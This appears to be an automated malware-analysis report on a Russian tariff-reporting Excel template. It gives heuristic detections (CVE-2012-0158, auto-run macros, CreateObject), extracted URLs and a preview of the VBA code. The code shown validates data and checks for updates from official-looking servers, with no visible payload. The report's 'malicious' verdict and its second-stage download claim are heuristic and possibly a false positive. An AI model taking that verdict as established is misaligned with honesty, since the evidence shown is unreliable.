MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The file is identified as malicious due to the exploitation of CVE-2012-0158, which is a known vulnerability in MSCOMCTL.ListView. The presence of a Workbook_Open VBA macro and a CreateObject call indicates that the macro is designed to execute automatically upon opening the document. The macro likely attempts to download and execute a second-stage payload, as suggested by the embedded URLs and the heuristic firing for XMLHTTP usage within the auto-execution context.
Heuristics 6
-
MSCOMCTL.ListView — CVE-2012-0158 high CVE likely CVE_2012_0158MSCOMCTL.ListView — CVE-2012-0158
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.fstrf.ru/regions/region/showlist In document text (OLE body)
- http://support.eias.ru/index.php?a=add&catid=5In document text (OLE body)
- http://eias.ru/?page=show_templatesIn document text (OLE body)
- http://eias.ru/files/distr/libs_for_templates_setup.rarIn document text (OLE body)
- http://www.imagemagick.orgw9yIn document text (OLE body)
- http://www.imagemagick.org��Q�In document text (OLE body)
- http://www.fstrf.ru/regions/region/showlist�In document text (OLE body)
- http://eias.ru/?page=show_templates7In document text (OLE body)
- https://tariff.eias.ru/procwsxls/�����#In document text (OLE body)
- https://appsrv02.eias.ru/procwsxls/���#In document text (OLE body)
- https://appsrv01.eias.ru/procwsxls/In document text (OLE body)
- https://eias.fstrf.ru/procwsxls/��In document text (OLE body)
- https://tariff.eias.ru/procwsxls/In document text (OLE body)
- https://appsrv02.eias.ru/procwsxls/In document text (OLE body)
- https://eias.fstrf.ru/procwsxls/�In document text (OLE body)
- https://eias.fstrf.ru/procwsxls/In document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Bryansk_Oblast.png�v�rIn document text (OLE body)
- http://www.imagemagick.orgIn document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Kursk_Oblast.png����In document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Coat_of_Arms_of_Pskov_oblast.pngIn document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Ivanovo_Oblast.pngIn document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Baikonur_seal.png��vYIn document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Saratov_Oblast.pngIn document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Yaroslavl_Oblast.pngT�In document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Kostroma_oblast.gif`+��In document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Ryazan_Oblast.pngIn document text (OLE body)
- http://commons.wikimedia.org/wiki/File:Flag_of_Moscow_Oblast.png/m8QIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 194081 bytes |
SHA-256: d313d3b59cd4b8d6dc5115d3f25b4123dc97315f51b987d68b17fda9273d9876 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Const SAVE_STATUS_CRITICAL_IMPACT_WARNING As String = "Шаблон сохранен, но НЕ БУДЕТ ПРИНЯТ к рассмотрению из-за невыполнения ОБЯЗАТЕЛЬНЫХ условий. См. лист 'Проверка'!"
Private Const SAVE_STATUS_SUCCESS As String = "Шаблон готов к сохранению без замечаний"
Private Const SAVE_STATUS_LOW_IMPACT_WARNING As String = "Шаблон будет принят к рассмотрению, но обратите внимание на сообщения на листе 'Проверка'"
Private Const SAVE_MESSAGE_TITLE As String = "Результат проверки"
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
' Exit Sub
Application.Calculate
Application.ReferenceStyle = xlA1
' Если не выбран регион - нечего проверять
If Len(CStr(Me.Names("region_name").RefersToRange.cells(1, 1).Value)) = 0 Then
Exit Sub
End If
modProv.WarningsBeforeSaving Me
If modGlobals.glngCriticalImpactWarningsCounter > 0 Then
Me.CustomDocumentProperties("Status") = 1 'ТРАНС
MsgBox SAVE_STATUS_CRITICAL_IMPACT_WARNING, vbCritical + vbOKOnly, SAVE_MESSAGE_TITLE
Me.Worksheets("Проверка").Activate
Me.Worksheets("Проверка").Range("A1").Select
ElseIf modGlobals.glngLowImpactWarningsCounter > 0 Then
Me.CustomDocumentProperties("Status") = 1 'ТРАНС
MsgBox SAVE_STATUS_LOW_IMPACT_WARNING, vbExclamation + vbOKOnly, SAVE_MESSAGE_TITLE
Me.Worksheets("Проверка").Activate
Me.Worksheets("Проверка").Range("A1").Select
Else 'ТРАНС
Me.CustomDocumentProperties("Status") = 2 'ТРАНС
MsgBox SAVE_STATUS_SUCCESS, vbInformation, SAVE_MESSAGE_TITLE
End If
On Error GoTo ErrHandler
Dim status As Integer
status = Me.CustomDocumentProperties("Status")
If status > 2 Then
MsgBox "Документ подписан ЭЦП и не может быть изменен", vbExclamation + vbOKOnly, ThisWorkbook.name
Cancel = True
Exit Sub
End If
Exit Sub
ErrHandler:
MsgBox Err.Description, vbOKOnly + vbExclamation, ThisWorkbook.name
End Sub
Private Sub Workbook_Open()
ThisWorkbook.CustomDocumentProperties("Status") = 1 'ТРАНС
Application.Calculation = xlCalculationAutomatic ' чтобы пересчет формул осуществлялся автоматически
' Для обновления
Dim wsSheet As Worksheet
For Each wsSheet In Me.Worksheets
If wsSheet.CodeName = "SHEET_UPDATE_INSTRUCTION" Then
If Me.Worksheets("Обновление").chkGetUpdates.Value = True Then
modUpdTemplMain.Check_Update_Execution Me
End If
End If
Next wsSheet
End Sub
Attribute VB_Name = "modHTTPServerCaller"
Option Explicit
Option Base 1
' Для реестров
Public Const STR_REESTR_TYPE As String = "REDU_Y"
Public Const STR_ACTIVITY_SPHERE As String = "EE"
Public Const STR_RANGE_NAME As String = "REESTR_ORG_RANGE"
Public Const STR_REESTR_SHEET_NAME As String = "REESTR_ORG"
Public Const STR_GTP_RANGE_NAME As String = "REESTR_GTP_RANGE"
Public Const STR_GTP_REESTR_SHEET_NAME As String = "REESTR_GTP"
' Адреса DNS, именно в этом порядке производится опрос
Public Const STR_HTTP_REQUEST_BASE_URL_1 As String = "https://tariff.eias.ru/procwsxls/"
Public Const STR_HTTP_REQUEST_BASE_URL_2 As String = "https://appsrv02.eias.ru/procwsxls/"
Public Const STR_HTTP_REQUEST_BASE_URL_3 As String = "https://appsrv01.eias.ru/procwsxls/" ' TBD
Public Const STR_HTTP_REQUEST_BASE_URL_4 As String = "https://eias.fstrf.ru/procwsxls/" ' TBD
Public Const STR_HTTP_REQUEST_PROC_MR_MO_OKTMO_NAME As String = "MO_REESTR?"
Public Const STR_HTTP_REQUEST_PROC_MR_MO_OKTMO_PARAM_1 As String = "p_NSRF="
Public Const STR_HTTP_REQUEST_PROC_MR_MO_OKTMO_PARAM_2 As String = "p_TC="
Public Const STR_HTTP_REQUEST_PROC_FIAS_NAME As String = "GET_FIAS_STREETS?"
Public Const STR_HTTP_REQU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.